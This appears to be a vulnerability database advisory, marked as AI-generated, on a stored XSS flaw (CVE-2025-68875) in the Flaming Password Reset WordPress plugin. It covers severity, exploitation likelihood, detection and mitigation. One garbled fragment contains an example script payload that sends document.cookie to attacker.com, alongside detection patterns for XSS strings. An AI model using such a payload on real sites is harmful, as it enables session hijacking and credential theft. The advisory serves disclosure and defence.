
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68875 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Flaming Password Reset (plugin slug: flaming-password-reset) developed by jcaruso001. It affects all versions up to and including 1.0.3, with no official patch available as of the time of disclosure. The vulnerability was reported by researcher Nguyen Xuan Chien on September 25, 2025, and published by Patchstack on December 29, 2025, with NVD publication on January 8, 2026. The CVSS v3.1 base score is 6.5 (Medium) as assessed by Patchstack (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant, meaning malicious script payloads are persisted server-side and later rendered in victims' browsers (Patchstack). The plugin fails to properly sanitize or escape user-supplied input before storing and rendering it in web pages, allowing an attacker to inject arbitrary HTML/JavaScript. Exploitation requires low privileges (the attacker must be able to submit input to the plugin's password reset functionality) and user interaction from a privileged user to trigger the stored payload. No public proof-of-concept code has been identified at this time.
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript within the WordPress site, which executes in the browsers of any user — including administrators — who views the affected page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of site visitors to malicious content. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting the broader WordPress environment and its users (Patchstack).
No public exploit code or active in-the-wild exploitation has been confirmed for CVE-2025-68875. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term (Feedly). Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack has issued a virtual patching/mitigation rule for subscribers while no official plugin patch exists.
/wp-content/plugins/flaming-password-reset/.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) to be injected into a user-controlled input field processed by the plugin.flaming-password-reset plugin.wp_options, wp_usermeta, or plugin-specific tables containing <script>, javascript:, onerror=, or similar XSS patterns in fields associated with the Flaming Password Reset plugin./wp-content/plugins/flaming-password-reset/ with version ≤ 1.0.3 confirmed via readme.txt or plugin header.No official patch from the plugin developer (jcaruso001) is available for versions ≤ 1.0.3 as of the disclosure date (Patchstack). The recommended immediate action is to deactivate and remove the Flaming Password Reset plugin until a patched version is released. Patchstack subscribers benefit from a virtual patching rule that blocks exploitation attempts without requiring a code-level fix. Site owners should also implement a Web Application Firewall (WAF) with XSS filtering rules as an additional layer of defense.
Wordfence included CVE-2025-68875 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026 (Wordfence). Patchstack, the assigning CNA, characterized the vulnerability class as commonly leveraged in mass-exploit campaigns against WordPress plugins. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."